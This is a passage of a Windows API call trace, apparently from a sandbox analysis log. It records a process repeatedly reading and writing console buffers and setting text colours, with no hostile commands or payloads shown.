lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.440] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.441] GetConsoleOutputCP () returned 0x1b5 [0312.442] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.442] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.442] CoTaskMemFree (pv=0x1ad7bc60) [0312.443] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.445] GetConsoleOutputCP () returned 0x1b5 [0312.446] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.446] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.447] CoTaskMemFree (pv=0x1ad7bc60) [0312.447] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.449] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.449] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.450] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.450] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.450] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.451] GetConsoleOutputCP () returned 0x1b5 [0312.451] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.452] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.453] CoTaskMemFree (pv=0x1ad7bc60) [0312.453] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fdb74*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fdb74*, lpNumberOfCharsWritten=0x1b83da58*=0x47) returned 1 [0312.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.455] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.455] GetConsoleOutputCP () returned 0x1b5 [0312.456] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.456] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.456] CoTaskMemFree (pv=0x1ad7bc60) [0312.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.457] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.457] GetConsoleOutputCP () returned 0x1b5 [0312.457] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.457] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.458] CoTaskMemFree (pv=0x1ad7bc60) [0312.458] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.459] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.459] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.460] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.460] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.461] GetConsoleOutputCP () returned 0x1b5 [0312.461] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.461] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.462] CoTaskMemFree (pv=0x1ad7bc60) [0312.462] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.463] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.463] GetConsoleOutputCP () returned 0x1b5 [0312.464] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.464] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.464] CoTaskMemFree (pv=0x1ad7bc60) [0312.464] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.465] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.465] GetConsoleOutputCP () returned 0x1b5 [0312.465] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.465] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.466] CoTaskMemFree (pv=0x1ad7bc60) [0312.466] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.467] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.468] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.469] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.469] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.470] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.470] GetConsoleOutputCP () returned 0x1b5 [0312.471] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.471] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.471] CoTaskMemFree (pv=0x1ad7bc60) [0312.472] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27feacc*, nNumberOfCharsToWrite=0x77, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27feacc*, lpNumberOfCharsWritten=0x1b83da58*=0x77) returned 1 [0312.472] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.473] GetConsoleOutputCP () returned 0x1b5 [0312.474] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.474] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.474] CoTaskMemFree (pv=0x1ad7bc60) [0312.474] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.475] GetConsoleOutputCP () returned 0x1b5 [0312.475] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.475] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.476] CoTaskMemFree (pv=0x1ad7bc60) [0312.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.477] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.477] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.478] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.479] GetConsoleOutputCP () returned 0x1b5 [0312.479] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.479] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.480] CoTaskMemFree (pv=0x1ad7bc60) [0312.480] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.481] GetConsoleOutputCP () returned 0x1b5 [0312.482] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.482] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.482] CoTaskMemFree (pv=0x1ad7bc60) [0312.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.484] GetConsoleOutputCP () returned 0x1b5 [0312.485] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.485] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.485] CoTaskMemFree (pv=0x1ad7bc60) [0312.485] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.487] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.487] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.488] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.488] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.489] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.489] GetConsoleOutputCP () returned 0x1b5 [0312.490] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.490] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.491] CoTaskMemFree (pv=0x1ad7bc60) [0312.491] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fee1c*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fee1c*, lpNumberOfCharsWritten=0x1b83da58*=0xf) returned 1 [0312.491] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.492] GetConsoleOutputCP () returned 0x1b5 [0312.493] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.493] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.493] CoTaskMemFree (pv=0x1ad7bc60) [0312.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.494] GetConsoleOutputCP () returned 0x1b5 [0312.495] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.495] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.496] CoTaskMemFree (pv=0x1ad7bc60) [0312.496] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.496] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.496] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.497] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.497] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.498] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.499] GetConsoleOutputCP () returned 0x1b5 [0312.500] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.500] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.501] CoTaskMemFree (pv=0x1ad7bc60) [0312.501] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.502] GetConsoleOutputCP () returned 0x1b5 [0312.503] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.503] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.503] CoTaskMemFree (pv=0x1ad7bc60) [0312.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.504] GetConsoleOutputCP () returned 0x1b5 [0312.505] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.505] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.506] CoTaskMemFree (pv=0x1ad7bc60) [0312.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.507] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.508] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.508] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.509] GetConsoleOutputCP () returned 0x1b5 [0312.510] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.510] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.510] CoTaskMemFree (pv=0x1ad7bc60) [0312.511] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fdd44*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fdd44*, lpNumberOfCharsWritten=0x1b83da58*=0x41) returned 1 [0312.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.512] GetConsoleOutputCP () returned 0x1b5 [0312.512] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.512] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.513] CoTaskMemFree (pv=0x1ad7bc60) [0312.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.514] GetConsoleOutputCP () returned 0x1b5 [0312.516] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.516] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.517] CoTaskMemFree (pv=0x1ad7bc60) [0312.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.518] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.519] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.520] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.521] GetConsoleOutputCP () returned 0x1b5 [0312.521] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.521] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.522] CoTaskMemFree (pv=0x1ad7bc60) [0312.522] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.523] GetConsoleOutputCP () returned 0x1b5 [0312.524] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.524] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.524] CoTaskMemFree (pv=0x1ad7bc60) [0312.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.525] GetConsoleOutputCP () returned 0x1b5 [0312.526] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.526] WriteConsoleOutputW (in: 